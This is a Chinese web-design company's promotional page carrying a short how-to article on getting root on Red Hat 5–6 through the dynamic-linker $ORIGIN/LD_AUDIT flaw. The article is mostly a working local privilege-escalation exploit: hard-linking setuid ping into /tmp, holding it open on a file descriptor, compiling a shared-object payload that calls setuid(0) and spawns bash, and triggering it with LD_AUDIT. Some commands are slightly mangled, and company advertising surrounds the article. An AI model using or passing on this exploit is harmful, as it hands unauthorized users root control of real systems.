我们专注攀枝花网站设计 攀枝花网站制作 攀枝花网站建设
成都网站建设公司服务热线:400-028-6601

网站建设知识

十年网站开发经验 + 多家企业客户 + 靠谱的建站团队

量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决

Redhat利用漏洞提权

漏洞试用系统:redhat 5—6通用

成都创新互联公司是一家专业提供屯溪企业网站建设,专注与成都做网站、成都网站设计、成都外贸网站建设成都h5网站建设、小程序制作等业务。10年已为屯溪众多企业、政府机构等服务。创新互联专业网络公司优惠进行中。

 

一.利用/tmp拥有777的权限

在/tmp下创建一个exploit目录

 

ln   /bin/ping(ping命令的权限很特殊是S,可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限,这里是root)

 

ln /bin/ping  /tmp/exploit/target

exec  3<  /tmp/exploit/target

rm  -rf  /tmp/exploit/

 

 

二.vim编写一段C语言程序(文件名payload.c)

 

void  __attribute__((constructor))  init()  //这里__是两个下划线

{

         setuid(0);

         system(“/bin/bash”);

}

 

使用GCC把这个文件编译一下

 

Gcc -w –fpic –shared –o /tmp/exploit payload.c

 

 

三.执行

 

LD_AUDIT=”\$ORIGIN”  exec/proc/self/fd/3


网页标题:Redhat利用漏洞提权
文章路径:http://shouzuofang.com/article/podeos.html

其他资讯